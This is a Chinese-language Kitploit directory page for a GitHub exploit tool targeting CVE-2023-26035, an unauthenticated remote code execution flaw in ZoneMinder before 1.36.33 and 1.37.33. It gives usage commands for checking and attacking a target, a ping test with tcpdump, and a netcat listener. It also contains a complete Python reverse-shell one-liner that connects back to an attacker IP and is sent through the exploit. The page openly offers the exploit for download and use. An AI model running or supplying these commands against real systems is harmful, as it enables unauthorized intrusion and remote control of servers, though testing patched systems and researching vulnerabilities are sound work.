Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
zoneminder_CVE-2023-26035 — 针对影响 ZoneMinder < 1.36.33 和 < 1.37.33 的 CVE-2023-26035 漏洞利用程序 | Kitploit
工具/GitHubGitHub/0xfalafel/zoneminder_cve-2023-26035
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队
GitHub0xfalafel/zoneminder_cve-2023-26035

zoneminder_CVE-2023-26035

针对影响 ZoneMinder < 1.36.33 和 < 1.37.33 的 CVE-2023-26035 漏洞利用程序

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
122年前尚未审核
分享

漏洞利用 - ZoneMinder CVE-2023-26035

存在一个未认证远程代码执行(RCE)漏洞,影响ZoneMinder的Snapshots。
这是针对CVE-2023-26035的一个漏洞利用。

受影响版本

ZoneMinder < 1.36.33 和
ZoneMinder < 1.37.33。

漏洞利用的使用演示

用法

检查目标是否易受攻击:

root@kitploit:~
python3 zoneminder.py http://target

执行命令

root@kitploit:~
python3 zoneminder.py http://target command

示例

使用测试命令执行

ping

在连接到目标的接口(此处为tun0)上运行tcpdump,并过滤ICMP数据包:

root@kitploit:~
sudo tcpdump -i tun0 icmp

然后向你的IP执行ping。确保使用引号",否则命令将无法被正确解析。

root@kitploit:~
python3 zoneminder.py http://target "ping -C 4 your_ip"

反弹Shell

使用netcat创建监听器:

root@kitploit:~
nc -lvnp 1337

使用一条反弹Shell命令:

root@kitploit:~
python3 zoneminder.py http://TARGET "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"

更多信息请访问 https://revshells.com。

依赖项

该漏洞利用工具使用了**requests和BeautifulSoup**。
使用以下命令安装:

root@kitploit:~
python3 -m pip install requests beautifulsoup4

致谢

我只是想要一个不需要Metasploit的独立漏洞利用工具。
该脚本源自 https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/zoneminder_snapshots.rb

https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr

下载工具